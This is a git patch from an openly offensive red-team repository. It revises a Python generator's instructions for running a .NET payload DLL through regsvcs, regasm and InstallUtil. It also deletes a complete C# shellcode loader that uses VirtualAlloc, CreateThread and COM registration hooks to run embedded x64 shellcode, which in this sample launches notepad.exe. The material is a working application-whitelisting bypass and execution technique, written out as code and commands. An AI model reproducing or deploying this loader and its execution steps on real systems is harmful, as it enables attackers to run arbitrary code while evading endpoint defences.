From ce933bb1c5ad6289179a69ef1915193fdf5c8095 Mon Sep 17 00:00:00 2001
From: "Mariusz B. / mgeeky" <mb@binary-offensive.com>
Date: Tue, 5 May 2020 20:32:23 +0200
Subject: [PATCH] Fix

---
 .../rogue-dot-net/generateRogueDotNet.py      |  17 ++-
 red-teaming/rogue-dot-net/program-template.cs | Bin 12670 -> 13360 bytes
 red-teaming/rogue-dot-net/program.cs          | 141 ------------------
 3 files changed, 11 insertions(+), 147 deletions(-)
 delete mode 100644 red-teaming/rogue-dot-net/program.cs

diff --git a/red-teaming/rogue-dot-net/generateRogueDotNet.py b/red-teaming/rogue-dot-net/generateRogueDotNet.py
index ce71b3a..f78d3f8 100644
--- a/red-teaming/rogue-dot-net/generateRogueDotNet.py
+++ b/red-teaming/rogue-dot-net/generateRogueDotNet.py
@@ -213,13 +213,17 @@ $usings
         Set-Content key.snk -Value $Content -Encoding Byte
 
     Step 2: Compile source code:
-        C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
+        %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
 
     Step 3: Execute your payload!
-        C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll 
-        C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
-        C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll 
-        C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
+        %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll 
+        %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll 
+
+        %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
+        %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
+
+        %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
+#       %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
 */
 
 namespace Program
@@ -352,8 +356,9 @@ def main(argv):
     commands = '''
 
 =====================================
+NEXT STEPS:
 
-Step 1: Create Your Strong Name Key -> key.snk
+Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory)
 
     $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
     $Content = [System.Convert]::FromBase64String($key)
diff --git a/red-teaming/rogue-dot-net/program-template.cs b/red-teaming/rogue-dot-net/program-template.cs
index cf4bbd93f5959b0ead2a8b303a3cc3a97c4fa646..ccdc917de32b9a7ae7e63b6dda8d171701e7e200 100644
GIT binary patch
delta 478
zcmZutF-yZ>5Pj4|iiR{Om0}>+r7jJwE)Fe%Ll;XY=}?oj7TQ$4RH0LxU2iW=oeTX7
z{U7>E#CK7QMhRcOyLb2A`|jRv*LUls6YQf5@9Vok7YihqBf=C-v@qj+&worLCf;Ej
zGM=z{jR#^^Jjxglo3LWgU}jj0aEd;tFRopc7i({NNwz64dh8yP>EWE`uYZgo>m%wJ
zdT6h{rdd!a=6r{|T6L*aPA<ZXJ0@#Hhu`nb-F@^})viZ61i6<~?0PyQs<Rn(==@&R
zrLjj|obmE4H2#_6b34KJ1W7hSo6H;=P=7(igzoAWQb#vCFCmiDPUYFLHY=x8mbb&*
U9Us1&Ij(GvpMK_>p?h@j0ctQ~eE<Le

delta 47
zcmdmx@h@q^JfX=Ggg7QknD9*I5|-MWBYKCEk#n-Yyd;p!mv02K6*o&LNQeLch^`Iy

diff --git a/red-teaming/rogue-dot-net/program.cs b/red-teaming/rogue-dot-net/program.cs
deleted file mode 100644
index 2dbdce1..0000000
--- a/red-teaming/rogue-dot-net/program.cs
+++ /dev/null
@@ -1,141 +0,0 @@
-
-using System;
-using System.Diagnostics;
-using System.Reflection;
-using System.Runtime.InteropServices;
-using System.EnterpriseServices;
-
-
-/*
-    Author: Casey Smith, Twitter: @subTee
-    Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
-    License: BSD 3-Clause
-
-    Step 1: Create Your Strong Name Key -> key.snk
-
-        $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
-        $Content = [System.Convert]::FromBase64String($key)
-        Set-Content key.snk -Value $Content -Encoding Byte
-
-    Step 2: Compile source code:
-        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
-
-    Step 3: Execute your payload!
-        C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll 
-        C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
-        C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll 
-        C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
-*/
-
-namespace Program
-{
-    public class Bypass : ServicedComponent
-    {
-        public Bypass() 
-        { 
-        }
-        
-        // This executes if registration is successful
-        [ComRegisterFunction]
-        public static void RegisterClass( string key )
-        {
-            Shellcode.Execute();
-        }
-        
-        // This executes if registration fails
-        [ComUnregisterFunction]
-        public static void UnRegisterClass( string key )
-        {
-            Shellcode.Execute();
-        }
-    }
-
-    [System.ComponentModel.RunInstaller(true)]
-    public class ForInstallUtil : System.Configuration.Install.Installer
-    {
-        // This executes during InstallUtil /U invocation
-        public override void Uninstall(System.Collections.IDictionary savedState)
-        {
-            Shellcode.Execute();
-        }
-    }
-    
-    public class Shellcode
-    {
-        
-        [DllImport("kernel32")]
-        private static extern IntPtr VirtualAlloc(
-            IntPtr lpAddress, UIntPtr dwSize, 
-            UInt32 flAllocationType, 
-            UInt32 flProtect
-        );
-
-        [DllImport("kernel32")]
-        private static extern bool VirtualFree(
-            IntPtr lpAddress, 
-            UInt32 dwSize, 
-            UInt32 dwFreeType
-        );
-
-        [DllImport("kernel32")]
-        private static extern IntPtr CreateThread( 
-            UInt32 lpThreadAttributes, 
-            UInt32 dwStackSize, 
-            IntPtr lpStartAddress, 
-            IntPtr param, 
-            UInt32 dwCreationFlags, 
-            ref UInt32 lpThreadId 
-        );
-
-        [DllImport("kernel32")]
-        private static extern bool CloseHandle(
-            IntPtr hHandle
-        );
-
-        [DllImport("kernel32")]
-        private static extern UInt32 WaitForSingleObject( 
-            IntPtr hHandle, 
-            UInt32 dwMilliseconds 
-        );
-
-        private static UInt32 MEM_COMMIT = 0x1000;
-        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
-        private static UInt32 MEM_RELEASE = 0x8000;
-
-        public static void Execute() {
-
-            byte[] payload = new byte[279] {
-                0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 
-                0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 
-                0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 
-                0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 
-                0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 
-                0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 
-                0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 
-                0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 
-                0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 
-                0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 
-                0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 
-                0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 
-                0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 
-                0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 
-                0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 
-                0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 
-                0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x6e, 0x6f, 0x74, 0x65, 0x70, 
-                0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00
-            };
-
-            IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-            Marshal.Copy(payload, 0, funcAddr, payload.Length);
-            IntPtr hThread = IntPtr.Zero;
-            UInt32 threadId = 0;
-
-            hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
-            WaitForSingleObject(hThread, 0xFFFFFFFF);
-
-            CloseHandle(hThread);
-            VirtualFree(funcAddr, 0, MEM_RELEASE);
-
-        }           
-    }
-}